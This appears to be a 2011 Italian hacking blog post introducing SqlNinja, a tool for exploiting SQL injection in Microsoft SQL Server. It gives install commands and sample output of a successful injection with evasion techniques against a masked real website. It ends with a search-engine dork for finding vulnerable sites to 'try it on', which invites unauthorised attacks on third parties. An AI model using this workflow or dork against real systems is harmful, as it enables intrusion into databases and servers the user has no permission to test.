ClsHack:Computer Security Blog    

[How-To] SqlNinja Exploiting Mircrosoft SQL Server :)

Posted on: 14 March 2011

SqlNinja è un software (scritto da Alberto Revelli) usato per cercare e sopratutto sfruttare “sql injection” su sistemi che si appoggiano a db Microsoft SQL Server.

SqlNinja è scritto in Perl e non ha molte dipendenze :)

SqlNinja permette di ottenere una shell sul database attaccato.
SqlNinja è in grado si di effettuare una fingerprint del server SQL, un attacco forza bruta della password dell’amministratore di sistema, un port scanning per individuare porte aperte, tunnel tramite la porta DNS oppure ICMP, quando tutte le porte TCP/UDP sono chiuse ma il server risolve i nomi host esterni oppure pinga :D

La sua potenza aumenta ancora di più se usato con metasploit :D

Un semplice video tutorial per utilizzare SqlNinja è disponibile sul sito ufficiale:
http://sqlninja.sourceforge.net/sqlninjademo.html
Oltre alla dettagliata documentazione:
http://sqlninja.sourceforge.net/sqlninja-howto.html

Ecco installare SqlNinja su Ubuntu e Backbox :)

I requisiti sono:

  • NetPacket
  • Net-Pcap
  • Net-DNS
  • Net-RawIP
  • IO-Socket-SSL

Digitare:
sudo apt-get install libnet-dns-perl libnet-pcap-perl libio-socket-ssl-perl libnet-rawip-perl libnetpacket-perl
perl -MCPAN -e "install NetPacket"
svn co https://sqlninja.svn.sourceforge.net/svnroot/sqlninja
cd sqlninja
:D
geany sqlninja.conf
./sqlninja

Un esempio:
clshack-desktop sqlninja # ./sqlninja -m test
Sqlninja rel. svn
Copyright (C) 2006-2011 icesurfer
[+] Parsing configuration file................
[+] Evasion technique(s):
- query hex-encoding
- comments as separator
- random case
- random URI encoding
[+] Port 80. Assuming cleartext
[+] Target is: www.***.it
[+] Trying to inject a 'waitfor delay'....
[+] Injection was successful! Let's rock !! :)
clshack-desktop sqlninja #

Se volete fare qualche prova dorkate :D
"SQL Server" inurl:"news.asp?id=" error
E robe simili :)

Related posts:

  1. [Remote-Router]Fake DNS and Phishing/Exploiting attack
  2. Tools for Exploiting SQL INJECTIONS
  3. Attack web server o.o [get root ._. shell ]
  4. [guida]Nikto 2.1.1 è tra noi: Trova vulnerabilità in server web
  5. Slowloris: Butta giù un server Apache(sito web) con un DOS !

This entry was posted on Monday, March 14th, 2011 at 3:23 pm and is filed under Hacking. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with: